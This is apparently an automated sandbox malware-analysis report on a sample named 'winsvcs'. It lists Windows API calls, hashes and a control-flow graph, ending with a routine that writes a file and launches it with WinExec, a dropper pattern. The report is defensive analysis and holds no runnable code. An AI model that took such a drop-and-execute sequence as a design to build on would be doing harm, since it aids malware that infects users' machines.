                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D018
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D044
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D0B7
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D23D
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D269
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D283
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D303
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D349
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D491
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D4BD
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D510
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D596
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D69C
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D740
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D786
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D835
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D861
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D8B4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D93A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D9CE
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040DA72
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DB57
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DBAA
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DC30
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040DDA1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DE71
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DEC4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DF4A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E05E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E114
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E167
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040E1F4
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040E297
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E363
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040E41B
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E447
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E461
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E502
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E606
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E657
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040E817
                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
                                                                                                                                                                                                                          • SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
                                                                                                                                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 0040EB99
                                                                                                                                                                                                                          • BeginPaint.USER32(0044A660,?), ref: 0040EBAE
                                                                                                                                                                                                                          • IsRectEmpty.USER32(?), ref: 0040EBBC
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040EBCE
                                                                                                                                                                                                                          • SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
                                                                                                                                                                                                                          • EndPaint.USER32(0044A660,?), ref: 0040EBF4
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC12
                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0040EC28
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC6E
                                                                                                                                                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0040ECE2
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040ECF1
                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 0040ED25
                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0040ED53
                                                                                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 0040ED67
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040ED7C
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040ED96
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040EDAC
                                                                                                                                                                                                                          • StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
                                                                                                                                                                                                                          • _printf.LIBCMT ref: 0040EDFB
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040EE12
                                                                                                                                                                                                                          • EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0040EE2A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCompatibleCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
                                                                                                                                                                                                                          • String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
                                                                                                                                                                                                                          • API String ID: 1152109118-461452962
                                                                                                                                                                                                                          • Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 255 479044-479074 GetPEB 256 479077-47909a 255->256 257 47909d-4790a0 256->257 258 4790a6-4790bc 257->258 259 4791ee-47922b CreateFileA 257->259 260 479110-479116 258->260 261 4790be-4790c5 258->261 276 479265-479269 259->276 277 47922d-479230 259->277 264 479129-47912f 260->264 265 479118-47911f 260->265 261->260 262 4790c7-4790ce 261->262 262->260 268 4790d0-4790d7 262->268 266 479131-479138 264->266 267 479148-47914e 264->267 265->264 269 479121-479124 265->269 266->267 271 47913a-479141 266->271 272 479167-47916f 267->272 273 479150-479157 267->273 268->260 274 4790d9-4790dd 268->274 270 4791bb-4791c0 269->270 279 4791c2-4791c5 270->279 280 4791e0-4791e9 270->280 271->267 278 479143-479146 271->278 282 479171-479178 272->282 283 479188-47918e 272->283 273->272 281 479159-479160 273->281 274->260 284 4790df-4790e3 274->284 285 479232-479238 277->285 278->270 279->280 286 4791c7-4791ca 279->286 280->257 281->272 287 479162-479165 281->287 282->283 288 47917a-479181 282->288 290 4791a7-4791ad 283->290 291 479190-479197 283->291 284->270 289 4790e9-47910b 284->289 293 479246-479252 WriteFile 285->293 294 47923a-479242 285->294 286->280 295 4791cc-4791cf 286->295 287->270 288->283 296 479183-479186 288->296 289->256 290->270 292 4791af-4791b6 290->292 291->290 297 479199-4791a0 291->297 292->270 298 4791b8 292->298 300 479255-479262 FindCloseChangeNotification WinExec 293->300 294->285 299 479244 294->299 295->280 301 4791d1-4791d4 295->301 296->270 297->290 303 4791a2-4791a5 297->303 298->270 299->300 300->276 301->280 304 4791d6-4791d9 301->304 303->270 304->280 305 4791db-4791de 304->305 305->259 305->280
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,00000005), ref: 00479262
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873594719.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_479000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
